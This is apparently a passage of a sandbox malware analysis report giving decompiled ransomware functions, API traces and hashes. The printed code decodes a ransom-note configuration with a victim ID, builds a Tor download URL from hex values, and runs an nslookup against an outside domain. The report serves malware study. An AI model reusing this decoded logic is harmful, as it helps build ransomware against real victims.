MessageBoxA.USER32 ref: 0FBC3738
GetLastError.KERNEL32 ref: 0FBC3773
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC39E2

Strings

Fatal error, xrefs: 0FBC372D
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FBC3732
B, xrefs: 0FBC3651
, xrefs: 0FBC370A
., xrefs: 0FBC363E
D, xrefs: 0FBC364A

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
API String ID: 1177701972-69869980
Opcode ID: 710df87eb3861dd69b3f253f68f3146ea06752a8fbec7ca9a5330da282897ba7
Instruction ID: 8d98337d6238a1669b38ee7942bdce5e6aa757747ae31ca8682656bd16a25cb6
Opcode Fuzzy Hash: 710df87eb3861dd69b3f253f68f3146ea06752a8fbec7ca9a5330da282897ba7
Instruction Fuzzy Hash: 9BC17D71E40308ABEB119B95DC46FEEBBB8FF08B11F204155F640BB181DBB869558FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC40E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FBC40E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfbd2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FBC39F0( &_v148);
				E0FBC7330( &_v236, __edx);
				_t97 = E0FBC7140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FBC6F40( &_v152, _t98);
				_t60 = E0FBC8090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfbd04a0]");
				_t77 = 0xfbd2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfbd2000) =  *(_t62 + 0xfbd2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfbd2a64 = 0xfbd2000;
				_t94 = E0FBC8090(0xfbd2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfbd2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xfbd2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0FBC7C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfbd2000;
					_t69 =  *0xfbd2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfbd2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0fbc40f5
0x0fbc43c8
0x0fbc43cd
0x0fbc43cd
0x0fbc40fb
0x0fbc40fc
0x0fbc40fe
0x0fbc40ff
0x0fbc4104
0x0fbc4106
0x0fbc4107
0x0fbc4109
0x0fbc410a
0x0fbc410c
0x0fbc410d
0x0fbc410f
0x0fbc4110
0x0fbc4115
0x0fbc4117
0x0fbc4118
0x0fbc4121
0x0fbc412d
0x0fbc413e
0x0fbc4147
0x0fbc4151
0x0fbc4157
0x0fbc4160
0x0fbc4171
0x0fbc416d
0x0fbc416d
0x0fbc416d
0x0fbc417b
0x0fbc4187
0x0fbc4193
0x0fbc4199
0x0fbc41a1
0x0fbc41a6
0x0fbc41ab
0x0fbc41ae
0x0fbc41b3
0x0fbc41c0
0x0fbc41c0
0x0fbc41c0
0x0fbc41c3
0x0fbc41c8
0x0fbc41cc
0x0fbc41d1
0x0fbc41d1
0x0fbc41e0
0x0fbc41e0
0x0fbc41e7
0x0fbc41e8
0x0fbc41f4
0x0fbc4208
0x0fbc420c
0x0fbc4286
0x0fbc428d
0x0fbc4295
0x0fbc429d
0x0fbc42a5
0x0fbc42ad
0x0fbc42b5
0x0fbc42bd
0x0fbc42c5
0x0fbc42cd
0x0fbc42d5
0x0fbc42dd
0x0fbc42e5
0x0fbc42ed
0x0fbc42f5
0x0fbc42fd
0x0fbc4305
0x0fbc430d
0x0fbc4315
0x0fbc431d
0x0fbc4325
0x0fbc432d
0x0fbc4335
0x0fbc433d
0x0fbc4345
0x0fbc434d
0x0fbc4355
0x0fbc435d
0x0fbc4365
0x0fbc436d
0x0fbc4375
0x0fbc4385
0x0fbc438b
0x0fbc4392
0x0fbc439f
0x0fbc43a5
0x0fbc4392
0x0fbc43b6
0x0fbc43c3
0x00000000
0x0fbc43c3
0x0fbc4210
0x0fbc4210
0x0fbc4212
0x0fbc4224
0x0fbc4228
0x0fbc422d
0x0fbc4236
0x00000000
0x00000000
0x0fbc423a
0x0fbc423d
0x0fbc4243
0x0fbc4243
0x0fbc424b
0x00000000
0x00000000
0x0fbc4250
0x0fbc4250
0x0fbc4256
0x00000000
0x00000000
0x0fbc4260
0x0fbc4262
0x0fbc426d
0x0fbc4271
0x00000000
0x00000000
0x00000000
0x0fbc4271
0x0fbc4264
0x0fbc426b
0x00000000
0x00000000
0x00000000
0x0fbc426b
0x0fbc43ce
0x00000000
0x0fbc4277
0x0fbc4277
0x0fbc4277
0x0fbc427b
0x0fbc427e
0x0fbc4281
0x00000000
0x0fbc4243
0x00000000

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4151
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4193
lstrcpyW.KERNEL32 ref: 0FBC4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4219

Strings

t, xrefs: 0FBC42BD
n, xrefs: 0FBC436D
., xrefs: 0FBC4365
d, xrefs: 0FBC4315
w, xrefs: 0FBC42AD
n, xrefs: 0FBC4305
/, xrefs: 0FBC42F5
r, xrefs: 0FBC42C5
c, xrefs: 0FBC42DD
d, xrefs: 0FBC431D
/, xrefs: 0FBC42A5
o, xrefs: 0FBC42FD
l, xrefs: 0FBC432D
a, xrefs: 0FBC4335
j, xrefs: 0FBC42D5
a, xrefs: 0FBC4345
o, xrefs: 0FBC430D
h, xrefs: 0FBC4355
w, xrefs: 0FBC42B5
s, xrefs: 0FBC429D
w, xrefs: 0FBC4325
., xrefs: 0FBC42E5
ransom_id=, xrefs: 0FBC4180, 0FBC418C
r, xrefs: 0FBC42ED
y, xrefs: 0FBC434D
-, xrefs: 0FBC433D
r, xrefs: 0FBC42CD
{USERID}, xrefs: 0FBC41EF, 0FBC423D, 0FBC4243
h, xrefs: 0FBC428D
t, xrefs: 0FBC4295
m, xrefs: 0FBC435D

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 0e6f32a160c31b1f0bc923cb0a24fedcf54b3d431c582effad47f21f24cd5901
Instruction ID: e3f9dd8b582bb904d872799338091093d6d9d4b1c7f9c76658d91c31adb01b0a
Opcode Fuzzy Hash: 0e6f32a160c31b1f0bc923cb0a24fedcf54b3d431c582effad47f21f24cd5901
Instruction Fuzzy Hash: EC710270104340CBE724DF10E82976B7BE2FB80B54F50499CF6845B292EBB99649CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120
pipememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xfbd2a70, 0xfbd2a6c,  &_v136, 0);
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xfbd2a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfbd2a68, 0xfbd2a74,  &_v136, 0);
						_t45 = SetHandleInformation( *0xfbd2a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0FBC4C40(_t66);
								E0FBC4DE0(_t57, _t64, _t57, _t64, _t66);
								VirtualFree(_t66, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}

0x0fbc4e9d
0x0fbc4ea8
0x0fbc4eab
0x0fbc4eaf
0x0fbc4eb1
0x0fbc4ebb
0x0fbc4ec2
0x0fbc4ec5
0x0fbc4ece
0x0fbc4ee2
0x0fbc4ee9
0x0fbc4ef0
0x0fbc4ef7
0x0fbc4efe
0x0fbc4f05
0x0fbc4f0c
0x0fbc4f13
0x0fbc4f1a
0x0fbc4f21
0x0fbc4f28
0x0fbc4f2f
0x0fbc4f36
0x0fbc4f3d
0x0fbc4f44
0x0fbc4f4b
0x0fbc4f52
0x0fbc4f59
0x0fbc4f60
0x0fbc4f67
0x0fbc4f6e
0x0fbc4f75
0x0fbc4f7c
0x0fbc4f83
0x0fbc4f8a
0x0fbc4f91
0x0fbc4f9b
0x0fbc4fa2
0x0fbc4fa9
0x0fbc4fb1
0x0fbc4fcd
0x0fbc4fd1
0x00000000
0x0fbc4fd3
0x0fbc4fe6
0x0fbc4ff6
0x0fbc4ffa
0x00000000
0x0fbc4ffc
0x0fbc5010
0x0fbc5014
0x0fbc5051
0x0fbc505f
0x0fbc5016
0x0fbc501b
0x0fbc5026
0x0fbc502f
0x0fbc503c
0x0fbc504a
0x0fbc504a
0x0fbc5014
0x0fbc4ffa
0x0fbc4fb3
0x0fbc4fb3
0x0fbc4fbc
0x0fbc4fbc

APIs

CreatePipe.KERNEL32(0FBD2A70,0FBD2A6C,?,00000000,00000001,00000001,00000000), ref: 0FBC4FA9
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBC4FCD
CreatePipe.KERNEL32(0FBD2A68,0FBD2A74,0000000C,00000000), ref: 0FBC4FE6
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBC4FF6
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FBC500A
wsprintfW.USER32 ref: 0FBC501B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC503C

Strings

n, xrefs: 0FBC4F2F
o, xrefs: 0FBC4F6E
l, xrefs: 0FBC4F36
o, xrefs: 0FBC4F3D
d, xrefs: 0FBC4F7C
r, xrefs: 0FBC4F28
S, xrefs: 0FBC4F52
d, xrefs: 0FBC4F1A
s, xrefs: 0FBC4F21
o, xrefs: 0FBC4EC5
., xrefs: 0FBC4F67
d, xrefs: 0FBC4EF7
, xrefs: 0FBC4F4B
r, xrefs: 0FBC4F8A
r, xrefs: 0FBC4F13
S, xrefs: 0FBC4EF0
., xrefs: 0FBC4F05
fabian wosar <3, xrefs: 0FBC504B
u, xrefs: 0FBC4EE2
s, xrefs: 0FBC4F83
, xrefs: 0FBC4EE9
o, xrefs: 0FBC4F0C
r, xrefs: 0FBC4F75
s, xrefs: 0FBC4F60
n, xrefs: 0FBC4E9D
s, xrefs: 0FBC4EFE
d, xrefs: 0FBC4F59
u, xrefs: 0FBC4F44
l, xrefs: 0FBC4EBB

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
API String ID: 1490407255-3453122116
Opcode ID: 2b98eaa12160a2f4629d41a4a145051f0d7177b045bd68bea1891636a197984c
Instruction ID: b0ff72e84b252968df8ad7f8d12322af4288340af4c0860eeff5f65558e10f60
Opcode Fuzzy Hash: 2b98eaa12160a2f4629d41a4a145051f0d7177b045bd68bea1891636a197984c
Instruction Fuzzy Hash: 5F418C70A00308DBEB10CF91E8587EEBFB5FB04759F104169E504AB291C7FA06498F95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC41D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfbd2000) =  *(_t41 + 0xfbd2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfbd2a64 = 0xfbd2000;
				_t60 = E0FBC8090(0xfbd2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfbd2000;
						_t49 =  *0xfbd2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfbd2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfbd2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xfbd2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0FBC7C10( &_a136);
				return _t44;
			}

0x0fbc41d6
0x0fbc41e0
0x0fbc41e0
0x0fbc41e7
0x0fbc41e8
0x0fbc41f4
0x0fbc4208
0x0fbc420c
0x0fbc4210
0x0fbc4210
0x0fbc4212
0x0fbc4224
0x0fbc4228
0x0fbc422d
0x0fbc4236
0x00000000
0x00000000
0x0fbc423a
0x0fbc423d
0x0fbc4243
0x0fbc4243
0x0fbc424b
0x00000000
0x0fbc4250
0x0fbc4250
0x0fbc4250
0x0fbc4256
0x00000000
0x00000000
0x0fbc4260
0x0fbc4262
0x0fbc426d
0x0fbc4271
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc4264
0x0fbc4264
0x0fbc426b
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc426b
0x00000000
0x0fbc4262
0x0fbc43ce
0x00000000
0x0fbc43ce
0x00000000
0x0fbc4277
0x0fbc4277
0x0fbc4277
0x0fbc427b
0x0fbc427e
0x0fbc4281
0x00000000
0x0fbc4243
0x0fbc4210
0x0fbc4286
0x0fbc428d
0x0fbc4295
0x0fbc429d
0x0fbc42a5
0x0fbc42ad
0x0fbc42b5
0x0fbc42bd
0x0fbc42c5
0x0fbc42cd
0x0fbc42d5
0x0fbc42dd
0x0fbc42e5
0x0fbc42ed
0x0fbc42f5
0x0fbc42fd
0x0fbc4305
0x0fbc430d
0x0fbc4315
0x0fbc431d
0x0fbc4325
0x0fbc432d
0x0fbc4335
0x0fbc433d
0x0fbc4345
0x0fbc434d
0x0fbc4355
0x0fbc435d
0x0fbc4365
0x0fbc436d
0x0fbc4375
0x0fbc4385
0x0fbc438b
0x0fbc4392
0x0fbc439f
0x0fbc43a5
0x0fbc4392
0x0fbc43b6
0x0fbc43c3
0x0fbc43cd

APIs

lstrcpyW.KERNEL32 ref: 0FBC4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4219
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC4385
wsprintfW.USER32 ref: 0FBC439F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC43B6

Strings

n, xrefs: 0FBC436D
t, xrefs: 0FBC42BD
., xrefs: 0FBC4365
d, xrefs: 0FBC4315
w, xrefs: 0FBC42AD
n, xrefs: 0FBC4305
/, xrefs: 0FBC42F5
r, xrefs: 0FBC42C5
c, xrefs: 0FBC42DD
/, xrefs: 0FBC42A5
d, xrefs: 0FBC431D
o, xrefs: 0FBC42FD
l, xrefs: 0FBC432D
a, xrefs: 0FBC4335
j, xrefs: 0FBC42D5
a, xrefs: 0FBC4345
o, xrefs: 0FBC430D
h, xrefs: 0FBC4355
w, xrefs: 0FBC42B5
s, xrefs: 0FBC429D
w, xrefs: 0FBC4325
., xrefs: 0FBC42E5
r, xrefs: 0FBC42ED
y, xrefs: 0FBC434D
-, xrefs: 0FBC433D
r, xrefs: 0FBC42CD
{USERID}, xrefs: 0FBC41EF, 0FBC423D, 0FBC4243
h, xrefs: 0FBC428D
t, xrefs: 0FBC4295
m, xrefs: 0FBC435D

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

